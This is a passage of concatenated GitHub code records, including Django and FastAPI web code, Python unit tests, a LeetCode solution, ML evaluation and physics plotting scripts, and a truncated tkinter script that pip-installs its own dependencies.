)\n        )\n\n\nclass MovieSearchForm(SearchForm):\n    def __init__(self, *args, **kwargs):\n        super(MovieSearchForm, self).__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.form_method = \"get\"\n        self.helper.form_class = \"form-horizontal form-search\"\n        self.helper.layout = Layout(\n            FieldWithButtons(\n                Field('q', css_class=\"search-query\"),\n                Submit(\"submit\", \"Search\"), css_class=\"input-search\"),\n        )\n","repo_name":"zcmander/mlist","sub_path":"mlist/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"33514458523","text":"# (c) 2014 Amplify Education, Inc. 
All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n__author__ = 'npandey'\n\n\nimport unittest\nfrom unittest.mock import MagicMock\nfrom edextract.student_reg_extract_processors.ed_org_data_processor import EdOrgDataProcessor\nfrom edextract.student_reg_extract_processors.attribute_constants import AttributeFieldConstants\nfrom edextract.trackers.total_tracker import TotalTracker\n\n\nclass TestEdOrgDataProcessor(unittest.TestCase):\n\n def setUp(self):\n self.tracker = TotalTracker()\n self.tracker.track_academic_year = MagicMock(return_value=None)\n self.tracker.track_matched_ids = MagicMock(return_value=None)\n self.tracker.track_asmt = MagicMock(return_value=None)\n\n self.category_tracker = [self.tracker]\n\n EdOrgDataProcessor.__abstractmethods__ = set() # Make this class instantiable for these tests only.\n self.data_processor = EdOrgDataProcessor(self.category_tracker, {})\n\n self.data = {AttributeFieldConstants.STATE_NAME: 'North Carolina', AttributeFieldConstants.STATE_CODE: 'NC'}\n\n def test_call_tracker(self):\n self.data_processor._call_academic_year_trackers('123', self.data)\n self.tracker.track_academic_year.assert_called_with('123', self.data)\n\n self.data_processor._call_academic_year_trackers('456', self.data)\n self.tracker.track_academic_year.assert_called_with('456', self.data)\n\n self.data_processor._call_academic_year_trackers('789', self.data)\n self.tracker.track_academic_year.assert_called_with('789', self.data)\n\n def test_call_matched_trackers(self):\n self.data_processor._call_matched_ids_trackers('123', self.data)\n self.tracker.track_matched_ids.assert_called_with('123', self.data)\n\n self.data_processor._call_matched_ids_trackers('456', self.data)\n self.tracker.track_matched_ids.assert_called_with('456', self.data)\n\n self.data_processor._call_matched_ids_trackers('789', self.data)\n self.tracker.track_matched_ids.assert_called_with('789', self.data)\n\n def test_add_to_and_get_ed_org_hierarchy(self):\n self.data_processor._add_to_edorg_hierarchy('123', 'NC')\n self.data_processor._add_to_edorg_hierarchy('456', 'NC', 'Gilfford')\n self.data_processor._add_to_edorg_hierarchy('789', 'NC', 'Gilfford', 'Daybreak School')\n\n self.assertEqual(3, len(self.data_processor.get_ed_org_hierarchy()))\n self.assertEqual('123', self.data_processor.get_ed_org_hierarchy()[('NC', '', '')])\n self.assertEqual('456', self.data_processor.get_ed_org_hierarchy()[('NC', 'Gilfford', '')])\n self.assertEqual('789', self.data_processor.get_ed_org_hierarchy()[('NC', 'Gilfford', 'Daybreak School')])\n\n def test_call_asmt_trackers(self):\n self.data_processor._call_asmt_trackers('123', self.data)\n self.tracker.track_asmt.assert_called_with('123', self.data)\n\n self.data_processor._call_asmt_trackers('456', self.data)\n self.tracker.track_asmt.assert_called_with('456', self.data)\n\n self.data_processor._call_asmt_trackers('789', self.data)\n 
self.tracker.track_asmt.assert_called_with('789', self.data)\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edextract/edextract/tests/student_reg_extract_processors/test_ed_org_data_processor.py","file_name":"test_ed_org_data_processor.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
{"seq_id":"9067143926","text":"'''\nGiven a linked list, remove the n-th node from the end of list and return its head.\n\nExample:\n\nGiven linked list: 1->2->3->4->5, and n = 2.\n\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\n\nGiven n will always be valid.\n\nFollow up:\n\nCould you do this in one pass?\n'''\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution(object):\n    def removeNthFromEnd(self, head, n):\n        \"\"\"\n        :type head: ListNode\n        :type n: int\n        :rtype: ListNode\n        \"\"\"\n\n        # Fast/slow pointers (first attempt)\n        first = ListNode(0) # a dummy node handles the edge case where the list has length one and becomes empty after the deletion\n        first.next = head\n        fast, slow = first, first\n        for i in range(n):\n            fast = fast.next\n        while fast.next:\n            fast = fast.next\n            slow = slow.next\n        slow.next = slow.next.next\n\n        return first.next\n\n\n        # Approach one: two pointers kept n apart (second attempt)\n        first = second = head\n        while n:\n            
first = first.next\n            n -= 1\n        if not first: return head.next\n        while first.next: # advance until the front pointer reaches the last node; the back pointer then sits just before the node to delete\n            first = first.next\n            second = second.next\n        second.next = second.next.next\n        return head\n","repo_name":"OnlyChristmas/leetcode","sub_path":"Python/remove-nth-node-from-end-of-list.py","file_name":"remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"}
{"seq_id":"29203093197","text":"from fastapi import Depends, HTTPException, Request\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Session\n\nfrom auth_api import get_user\nfrom db import get_db\nfrom models import PermissionSet\nfrom models.location import Building, BuildingType\nfrom permissions import has_permission\nfrom request_models import create_pagination_model\nfrom request_models.location_requests import BuildingModel, AddBuildingModel, ChangeBuildingModel, BuildingTypeModel, \\\n    AddBuildingTypeModel, BuildingTypeCountModel\nfrom routes import metrics_router\nfrom utils import paginate, apply_filtering\n\n\n@metrics_router.get(\"/building-types/\", status_code=200, response_model=create_pagination_model(BuildingTypeModel))\nasync def get_building_types(request: Request, db: Session = Depends(get_db), ):\n    has_permission(request, PermissionSet.BuildingTypeRead.value)\n    return paginate(\n        db=db,\n        db_model=BuildingType,\n        serializer=BuildingTypeModel,\n        request=request\n    )\n\n\n@metrics_router.get(\"/building-types/count/\", status_code=200,\n                    response_model=create_pagination_model(BuildingTypeCountModel))\nasync def get_building_types_count(request: Request, db: Session = Depends(get_db)):\n    has_permission(request, PermissionSet.BuildingTypeRead.value)\n    result_models, count, page_number = apply_filtering(db, BuildingType, request)\n    items = [BuildingTypeCountModel(id=b.id, name=b.name, buildings_count=len(b.buildings)) for b in result_models]\n    return {\n        'total_size': count,\n        'page_number': page_number,\n        'page_size': len(items),\n        'items': items\n    }\n\n\n@metrics_router.post(\"/building-types/\", status_code=201, response_model=BuildingTypeModel)\nasync def add_building_type(request: Request, body: AddBuildingTypeModel, db: Session = Depends(get_db)):\n    has_permission(request, PermissionSet.BuildingTypeEdit.value)\n    building_type = BuildingType(name=body.name)\n    db.add(building_type)\n    try:\n        db.commit()\n    except IntegrityError:\n        raise HTTPException(detail='BuildingType already exists', status_code=400)\n    return BuildingTypeModel.from_orm(building_type)\n\n\n@metrics_router.patch(\"/building-types/{building_type_id}\", status_code=200, response_model=BuildingTypeModel)\nasync def patch_building_type(request: Request, building_type_id: int, body: AddBuildingTypeModel,\n                              db: Session = Depends(get_db), ):\n    has_permission(request, PermissionSet.BuildingTypeEdit.value)\n    building_type = db.query(BuildingType).filter_by(id=building_type_id).first()\n\n    building_type.name = body.name\n    db.add(building_type)\n    db.commit()\n    return BuildingTypeModel.from_orm(building_type)\n\n\n@metrics_router.delete(\"/building-types/{building_type_id}/\", status_code=200)\nasync def remove_building_type(request: Request, building_type_id: int, db: Session = Depends(get_db)):\n    has_permission(request, PermissionSet.BuildingTypeEdit.value)\n    db.query(BuildingType).filter_by(id=building_type_id).delete()\n    db.commit()\n    return \"\"\n\n\n@metrics_router.get(\"/buildings/\", status_code=200, 
response_model=create_pagination_model(BuildingModel))\nasync def get_buildings(request: Request, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingRead.value)\n paginated = paginate(\n db=db,\n db_model=Building,\n serializer=BuildingModel,\n request=request\n )\n for index, building in enumerate(paginated['items']):\n for user in building.responsible_people:\n user.user = get_user(user.user_id)\n return paginated\n\n\n@metrics_router.post(\"/buildings/\", status_code=201, response_model=BuildingModel)\nasync def add_building(request: Request, body: AddBuildingModel, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingEdit.value)\n building = Building(**body.dict())\n db.add(building)\n try:\n db.commit()\n except IntegrityError:\n raise HTTPException(detail='Building already exists', status_code=400)\n return BuildingModel.from_orm(building)\n\n\n@metrics_router.patch(\"/buildings/{building_id}\", status_code=200, response_model=BuildingModel)\nasync def patch_building(request: Request, building_id: int, body: ChangeBuildingModel,\n db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingEdit.value)\n building = db.query(Building).filter_by(id=building_id).first()\n\n args = {k: v for k, v in body.dict(exclude_unset=True).items()}\n if args:\n for k, v in args.items():\n setattr(building, k, v)\n\n db.add(building)\n db.commit()\n return BuildingModel.from_orm(building)\n\n\n@metrics_router.delete(\"/buildings/{building_id}/\", status_code=200)\nasync def remove_building(request: Request, building_id: int, db: Session = Depends(get_db)):\n has_permission(request, PermissionSet.BuildingEdit.value)\n db.query(Building).filter_by(id=building_id).delete()\n db.commit()\n return \"\"\n","repo_name":"Nerphist/microservice-architecture","sub_path":"metrics_service/routes/locations/buildings.py","file_name":"buildings.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19163227722","text":"import pickle\nfrom tqdm import tqdm\nfrom library.HRNN import validation_output\nfrom library.HRNN import eval_conll2000\n\ndef eval_hu(test_data, test_tags_gt, single_words=False, **args):\n output = \"\"\n for i, (pair, true_tag) in tqdm(enumerate(zip(test_data, test_tags_gt)), total=len(test_data)):\n if single_words:\n ind = [1 for t in pair[1]]\n else:\n ind = [t=='2' for t in pair[1]]\n vo = validation_output(ind, true_tag)\n output += vo\n fscore, acc = eval_conll2000(output, **args)\n return fscore, acc\n\n\nif __name__ == \"__main__\":\n # TEST_PATH = \"experiments/second_order_hiddendim_anal_FA/test_predicted_0.pkl\"\n TEST_PATH = \"HRNNdata_fa/test.pkl\"\n TEST_TRUE_TAGS_PATH = \"HRNNdata_fa/test_tag.pkl\"\n\n test_data = pickle.load(open(TEST_PATH, 'rb'))\n test_tags_gt = pickle.load(open(TEST_TRUE_TAGS_PATH, 'rb'))#[:len(test_data)]\n print(len(test_data), len(test_tags_gt))\n fscore, acc = eval_hu(test_data, test_tags_gt)\n print( \" __________________________________\")\n print(f\"| Test:\")\n print(f\"| F1: {fscore}\")\n print(f\"| Accuracy: {acc}\")\n print( \"|__________________________________\")","repo_name":"ShayeghB/HRNN-Unsupervised-Chunking","sub_path":"eval_heuristic.py","file_name":"eval_heuristic.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21539320858","text":"from greplin import 
scales\nfrom flask import Flask\n\n\nSTATS = scales.collection('/web', scales.PmfStat('latency'))\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello():\n with STATS.latency.time():\n return 'finished'\n\n\nif __name__ == '__main__':\n app.run(port=8888)\n","repo_name":"emilssolmanis/tapes","sub_path":"benchmark/flask/scales_metrics_single_process.py","file_name":"scales_metrics_single_process.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"24237466182","text":"# creating color map and manipulating color bar\r\n\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\n# import matplotlib.cm as cm\r\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\r\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\r\n\r\ninterp = 'bilinear'\r\ncdw = -0.65\r\neta = 0.003\r\nmu = -0.23\r\nsave_path = f'D:/phd_projects/NTU/exciton_NTU/6-fold-DOS/separate_cosine_terms/data_xedge_eta_{eta}/'\r\n\r\ndata1 = np.loadtxt(f'unitcell_avg_ldos_data_sm_2pi6_mu{mu}_eta_{eta}_cdw{cdw}.dat')\r\n\r\nnx = 6\r\nny = 40\r\nlayer = int(ny/2)\r\nplotting_layer = int(ny/2)\r\n\r\n# en1 = -50\r\n# en2 = -20\r\n\r\n# for i in range(len(data1)):\r\n# if data1[i, 0] == en1:\r\n# e1_num = i\r\n\r\n# for j in range(len(data1)):\r\n# if data1[j, 0] == en2:\r\n# e2_num = j\r\n\r\nen_line = -30\r\nfor j in range(len(data1)):\r\n if data1[j, 0] == en_line:\r\n eline_num = j\r\n\r\n\r\n# print(e1_num,e2_num)\r\n\r\n\r\n# define function for custom aspect ratio\r\ndef forceaspect(ax, aspect=1):\r\n im = ax.get_images()\r\n extent = im[0].get_extent()\r\n ax.set_aspect(abs((extent[1] - extent[0]) / (extent[3] - extent[2])) / aspect)\r\n\r\n\r\n\"\"\"for a particular energy (line cut)\"\"\"\r\ndata2 = data1[eline_num, 1:nx * layer + 1]\r\n\r\n\r\ndata = data2.reshape(layer, nx)\r\n# print(data2)\r\nnew_data = []\r\nfor i in range(plotting_layer, 0, -1):\r\n for j in range(0, len(data[0])):\r\n new_data.append([j + 1, i, data[i - 1, j]])\r\ninfo = 'X(a) Y(b) DOS'\r\nnp.savetxt(f\"{save_path}Topographic_DOS_data_E_{en_line}.dat\", new_data, header=info, fmt=\"%10.6f\")\r\n# colors = ['navy', 'blue', 'red', '#FFFF14']\r\n# colors = ['navy', 'dodgerblue', 'red','white']\r\n# cmap_name = 'my_list'\r\n# cm = LinearSegmentedColormap.from_list(\r\n# cmap_name, colors, N=1000)\r\n# norm = mpl.colors.Normalize(vmin=np.min(data), vmax=np.max(data))\r\n\r\nplt.rcParams[\"figure.figsize\"] = [12, 4]\r\nplt.rcParams[\"figure.autolayout\"] = True\r\nfig = plt.figure()\r\n\r\n\r\nax1 = fig.add_subplot(131)\r\n\r\nxtic = np.linspace(1,nx,nx)\r\nytic = np.round(np.array([i for i in range(1,plotting_layer,int(plotting_layer/5))]))\r\n\r\nx, y, z = np.loadtxt(f'{save_path}Topographic_DOS_data_E_{en_line}.dat', skiprows=1, unpack=True)\r\nN = int(nx)\r\nz = z.reshape(plotting_layer, N)\r\nax1.set_xlabel('X(a)', fontsize=18)\r\nax1.set_ylabel('Y(b)', fontsize=18)\r\nax1.set_xticks(xtic,fontsize=18)\r\nax1.set_yticks(ytic,fontsize=18)\r\nax1.set_title(f\"{en_line} meV\", fontsize=15)\r\n# plt.ylim(2, plotting_layer)\r\n# plt.subplot(1,3,1)\r\nim=ax1.imshow(z, interpolation=interp, extent=(np.amin(x), np.amax(x), np.amin(y), np.amax(y)))#,cmap=cm, norm=norm)\r\nforceaspect(ax1, aspect=0.8)\r\n\r\nax1.tick_params(direction='out', length=5, width=1, colors='k', bottom=True, top=False, left=True, right=False)\r\nfig.colorbar(im)\r\n# 
plt.savefig(f\"topo_ldos_sum_all_density_xe_OP_pi_sm_2pi6_mu{mu}.png\", dpi=600)\r\n# plt.savefig(f\"topograph_DOS_en{en_line}.png\", dpi=600)\r\n\r\n# plt.show()\r\n\r\n#%%\r\n#x-edge-line-cut-slong-edge\r\nplt.rcParams[\"figure.figsize\"] = [5, 7]\r\nplt.rcParams[\"figure.autolayout\"] = True\r\n\r\nax2 = fig.add_subplot(132)\r\nx_list = np.linspace(1,nx,nx)\r\nytic2 = np.linspace(0.03,0.1,int(5))\r\n# plt.subplot(1,3,2)\r\nax2.plot(x_list,z[plotting_layer-1],'k')\r\nax2.set_xlabel('X(a)', fontsize=18)\r\nax2.set_ylabel('DOS', fontsize=18)\r\nax2.set_title(\"line cut of DOS along X edge\\n\", fontsize=15)\r\nax2.set_xlim(0,7)\r\n# ax2.set_xticks(x_list,fontsize=18)\r\n# ax2.set_yticks(ytic2,fontsize=18)\r\n# forceaspect(ax2, aspect=0.4)\r\n\r\nax2.tick_params(direction='in', length=5, width=1, colors='k', bottom=True,\r\n top=False, left=True, right=False)\r\n# plt.savefig(f\"x_edge_DOS_line_cut_{en_line}.png\",dpi = 300)\r\n# plt.show()\r\n\r\n\r\n\r\n#%%\r\n#x-edge-line-cut-across-edge\r\n# c_list = ['red','blue','green','yellow','pink','black']\r\n# label_list = ['X = 1','X = 2','X = 3','X = 4','X = 5','X = 6']\r\n# plt.rcParams[\"figure.figsize\"] = [5, 5]\r\n# plt.rcParams[\"figure.autolayout\"] = True\r\ny_list = np.linspace(1,plotting_layer,plotting_layer)\r\nytic3 = np.linspace(0.03,0.1,5)\r\nxtic3 = np.round(np.linspace(1,plotting_layer,int(plotting_layer/5)))\r\n\r\n\r\nax3 = fig.add_subplot(133)\r\n# plt.subplot(1,3,3)\r\nfor i in range(int(nx)):\r\n ax3.plot(y_list,np.flip(z.T[i]))#,c_list[i])#,label=label_list[i])\r\n ax3.legend(loc=(0.2,0.7),fontsize=12,ncol=2,frameon=False)\r\n \r\nax3.set_xlabel('Y(b)', fontsize=18)\r\nax3.set_ylabel('DOS', fontsize=18)\r\nax3.set_title(\"line cut of DOS across X edge\\n\", fontsize=15)\r\n# ax3.set_xticks(xtic3,fontsize=18)\r\n# ax3.set_yticks(ytic3,fontsize=18)\r\n\r\n\r\nax3.tick_params(direction='in', length=5, width=1, colors='k', bottom=True,\r\n top=False, left=True, right=False)\r\n# plt.savefig(f\"x_edge_DOS_across_line_cut_{en_line}.png\",dpi = 300)\r\nplt.savefig(f\"{save_path}x_edge_{en_line}.png\",dpi = 300)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nline_cut = np.array([x_list,z[plotting_layer-1]]).T\r\nnp.savetxt(f\"{save_path}x_edge_DOS_along_edge{en_line}.dat\",line_cut, fmt=\"%10.6f\")\r\n\r\nline_cut = np.array([y_list,np.flip(z.T[0]),np.flip(z.T[1]),np.flip(z.T[2]),np.flip(z.T[3]),np.flip(z.T[4]),np.flip(z.T[5])]).T\r\nnp.savetxt(f\"{save_path}x_edge_DOS_across_edge{en_line}.dat\",line_cut, fmt=\"%10.6f\")\r\n#%%\r\n# \"\"\"CDW order parameter\"\"\"\r\n\r\n# # define function for custom aspect ratio\r\n# def forceaspect(ax, aspect=1):\r\n# im = ax.get_images()\r\n# extent = im[0].get_extent()\r\n# ax.set_aspect(abs((extent[1] - extent[0]) / (extent[3] - extent[2])) / aspect)\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111)\r\n# # colors = ['navy', 'blue', 'red', '#FFFF14']\r\n# colors = ['navy', 'dodgerblue', 'red','white']\r\n# # colors = ['r','y']\r\n# cmap_name = 'my_list'\r\n# cm = LinearSegmentedColormap.from_list(\r\n# cmap_name, colors, N=1000)\r\n# norm = mpl.colors.Normalize(vmin=np.min(data), vmax=np.max(data))\r\n\r\n# # plt.rcParams[\"figure.figsize\"] = [6, 5]\r\n# # plt.rcParams[\"figure.autolayout\"] = True\r\n\r\n# # den_data = np.loadtxt(\"density_data_semi_metallic.dat\")\r\n# den_data = np.loadtxt(\"WTe2_cdw_gap_data.dat\")\r\n# dd = den_data.reshape(int(len(den_data)/4),4)\r\n# x_list = np.linspace(1,nx,nx) \r\n# y_list = np.linspace(1,ny,ny) \r\n# density_grid = 
(sum(dd.T)/4).reshape(ny,nx)\r\n\r\n# plt.imshow(density_grid, interpolation=interp,extent=(np.amin(x_list), np.amax(x_list), np.amin(y_list), np.amax(y_list)),\r\n# cmap=cm)\r\n# forceaspect(ax, aspect=1)\r\n\r\n# plt.xlabel('X', fontsize=18)\r\n# plt.ylabel('Y', fontsize=18)\r\n# plt.xticks(fontsize=18)\r\n# plt.yticks(fontsize=18)\r\n# plt.tick_params(direction='out', length=5, width=1, colors='k', bottom=True,\r\n# top=False, left=True, right=False)\r\n# plt.colorbar()\r\n# plt.show()\r\n\r\n# \"\"\"CDW order parameter\"\"\"\r\n\r\n# # define function for custom aspect ratio\r\n# # def forceaspect(ax, aspect=1):\r\n# # im = ax.get_images()\r\n# # extent = im[0].get_extent()\r\n# # ax.set_aspect(abs((extent[1] - extent[0]) / (extent[3] - extent[2])) / aspect)\r\n# # fig = plt.figure()\r\n# # ax = fig.add_subplot(111)\r\n# # colors = ['navy', 'blue', 'red', '#FFFF14']\r\n# colors = ['navy', 'dodgerblue', 'red','white']\r\n# # colors = ['r','y']\r\n# cmap_name = 'my_list'\r\n# cm = LinearSegmentedColormap.from_list(\r\n# cmap_name, colors, N=1000)\r\n# norm = mpl.colors.Normalize(vmin=np.min(data), vmax=np.max(data))\r\n\r\n# plt.rcParams[\"figure.figsize\"] = [6, 5]\r\n# plt.rcParams[\"figure.autolayout\"] = True\r\n\r\n# # den_data = np.loadtxt(\"density_data_semi_metallic.dat\")\r\n# den_data = np.loadtxt(\"WTe2_cdw_gap_data.dat\")\r\n# dd = den_data.reshape(int(len(den_data)/4),4)\r\n# x_list = np.linspace(1,nx,nx) \r\n# y_list = np.linspace(1,ny,ny) \r\n# density_grid = (sum(dd.T)/4).reshape(ny,nx)\r\n\r\n# plt.imshow(density_grid, interpolation=interp,extent=(np.amin(x_list), np.amax(x_list), np.amin(y_list), np.amax(y_list)),\r\n# cmap=cm)\r\n# # forceaspect(ax, aspect=1)\r\n\r\n# plt.xlabel('X', fontsize=18)\r\n# plt.ylabel('Y', fontsize=18)\r\n# plt.xlim(1,6)\r\n# plt.xticks(fontsize=18)\r\n# plt.yticks(fontsize=18)\r\n# plt.tick_params(direction='out', length=5, width=1, colors='k', bottom=True,\r\n# top=False, left=True, right=False)\r\n# plt.colorbar()\r\n# plt.show()\r\n\r\n\r\n","repo_name":"anirban8653/excitonic_insulator","sub_path":"plot_xe.py","file_name":"plot_xe.py","file_ext":"py","file_size_in_byte":8083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241461505","text":"# Given the root of a binary tree and an integer targetSum, return all root-to-leaf paths where the sum of the node values equals targetSum.\n#\n# A leaf is a node with no children.\n#\n\n# the whole tree has to be traversed, so the recursion returns nothing\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom typing import List, Optional\n\nclass Solution:\n def __init__(self):\n self.res = []\n self.path = []\n\n def calSum(self, root, count):\n if not root.left and not root.right and not count:\n self.res.append(self.path[:])\n return\n if not root.left and not root.right and count:\n return\n\n if root.left:\n self.path.append(root.left.val)\n count -= root.left.val\n self.calSum(root.left, count)\n count += root.left.val\n self.path.pop()\n if root.right:\n self.path.append(root.right.val)\n count -= root.right.val\n self.calSum(root.right, count)\n count += root.right.val\n self.path.pop()\n\n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> List[List[int]]:\n if not root:\n return []\n self.path = [root.val]\n self.calSum(root, targetSum - root.val)\n return self.res","repo_name":"vandeppce/algorithm","sub_path":"7.binary 
tree/113PathSum.py","file_name":"113PathSum.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73105750249","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 21 22:29:46 2020\r\n\r\n@author: kingslayer\r\n\"\"\"\r\n\r\n#POLYNOMIAL REGRESSION\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n#importing the dataset\r\ndataset=pd.read_csv(r\"Position_Salaries.csv\")\r\n\r\n# creating matrix of features\r\nX=dataset.iloc[:,1:2].values\r\n\r\n#creating dependent variable vector\r\ny=dataset.iloc[:,-1].values\r\n\r\n#splitting into training and test set\r\n\"\"\"from sklearn.model_selection import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)\"\"\"\r\n\r\n#creating linear regression model\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg=LinearRegression()\r\nlin_reg.fit(X,y)\r\n\r\n#creating polynomial regression model\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg=PolynomialFeatures(degree=4)\r\nX_poly=poly_reg.fit_transform(X)\r\n\"\"\"now again fitting linear model to X_poly\"\"\"\r\nlin_reg2=LinearRegression()\r\nlin_reg2.fit(X_poly,y)\r\n\r\n#visualising the results of linear model\r\nplt.scatter(X,y,color=\"red\")\r\nplt.plot(X,lin_reg.predict(X))\r\nplt.title(\"Position vs Salary(Linear Model)\")\r\nplt.xlabel(\"Position\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#Visualising the results of polynomial model\r\nX_grid=np.arange(min(X),max(X),0.1)\r\nX_grid=X_grid.reshape(len(X_grid),1)\r\nplt.scatter(X,y,color=\"red\")\r\nplt.plot(X_grid,lin_reg2.predict(poly_reg.fit_transform(X_grid)),color=\"blue\")\r\nplt.title(\"Position vs Salary(Polynomial Model)\")\r\nplt.xlabel(\"Position\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#predicting new results with linear model\r\nlin_reg.predict([[6.5]])\r\n\r\n#predicting new results with polynomial model\r\nlin_reg2.predict(poly_reg.fit_transform([[8]]))","repo_name":"kingslayer2357/ML_Basics_PolynomialRegression","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29477941363","text":"import numpy as np\nimport numpy.testing as npt\nimport pandas as pd\nfrom stumpy import core\nimport pytest\n\n\ndef naive_rolling_window_dot_product(Q, T):\n window = len(Q)\n result = np.zeros(len(T) - window + 1)\n for i in range(len(result)):\n result[i] = np.dot(T[i : i + window], Q)\n return result\n\n\ndef test_check_dtype_float32():\n assert core.check_dtype(np.random.rand(10).astype(np.float32))\n\n\ndef test_check_dtype_float64():\n assert core.check_dtype(np.random.rand(10))\n\n\ndef test_df_to_array():\n a = np.random.rand(10)\n assert core.check_dtype(core.df_to_array(a))\n df = pd.Series(a)\n assert core.check_dtype(core.df_to_array(df))\n\n\ntest_data = [\n (np.array([-1, 1, 2], dtype=np.float64), np.array(range(5), dtype=np.float64)),\n (\n np.array([9, 8100, -60], dtype=np.float64),\n np.array([584, -11, 23, 79, 1001], dtype=np.float64),\n ),\n (np.random.uniform(-1000, 1000, [8]), np.random.uniform(-1000, 1000, [64])),\n]\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_sliding_dot_product(Q, T):\n left = naive_rolling_window_dot_product(Q, T)\n right = core.sliding_dot_product(Q, T)\n npt.assert_almost_equal(left, 
right)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_compute_mean_std(Q, T):\n m = Q.shape[0]\n left_μ_Q = np.sum(Q) / m\n left_σ_Q = np.sqrt(np.sum(np.square(Q - left_μ_Q) / m))\n left_M_T = np.mean(core.rolling_window(T, m), axis=1)\n left_Σ_T = np.std(core.rolling_window(T, m), axis=1)\n right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m)\n right_M_T, right_Σ_T = core.compute_mean_std(T, m)\n npt.assert_almost_equal(left_μ_Q, right_μ_Q)\n npt.assert_almost_equal(left_σ_Q, right_σ_Q)\n npt.assert_almost_equal(left_M_T, right_M_T)\n npt.assert_almost_equal(left_Σ_T, right_Σ_T)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_calculate_distance_profile(Q, T):\n m = Q.shape[0]\n left = np.linalg.norm(\n core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1\n )\n QT = core.sliding_dot_product(Q, T)\n μ_Q, σ_Q = core.compute_mean_std(Q, m)\n M_T, Σ_T = core.compute_mean_std(T, m)\n right = core.calculate_distance_profile(m, QT, μ_Q, σ_Q, M_T, Σ_T)\n npt.assert_almost_equal(left, right)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_mueen_calculate_distance_profile(Q, T):\n m = Q.shape[0]\n left = np.linalg.norm(\n core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1\n )\n right = core.mueen_calculate_distance_profile(Q, T)\n npt.assert_almost_equal(left, right)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_mass(Q, T):\n m = Q.shape[0]\n left = np.linalg.norm(\n core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1\n )\n right = core.mass(Q, T)\n npt.assert_almost_equal(left, right)\n","repo_name":"adhankhar24/time-series-stump","sub_path":"tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14959545892","text":"import tkinter as tk\r\nimport math\r\n\r\ntry:\r\n import tkinter as tk\r\n from tkinter import StringVar, IntVar, ttk\r\n import matplotlib.pyplot as plt\r\n import numpy as np\r\n\r\nexcept ImportError:\r\n from subprocess import call\r\n from tkinter import StringVar, ttk, Tk\r\n\r\n def download():\r\n text_var.set(\"Der Download beginnt...\")\r\n fenster.update()\r\n call(\"curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\")\r\n call(\"python -m pip install -I pip\")\r\n call(\"pip install matplotlib\")\r\n call(\"pip install numpy\")\r\n # call(\"pip install ttkthemes\")\r\n 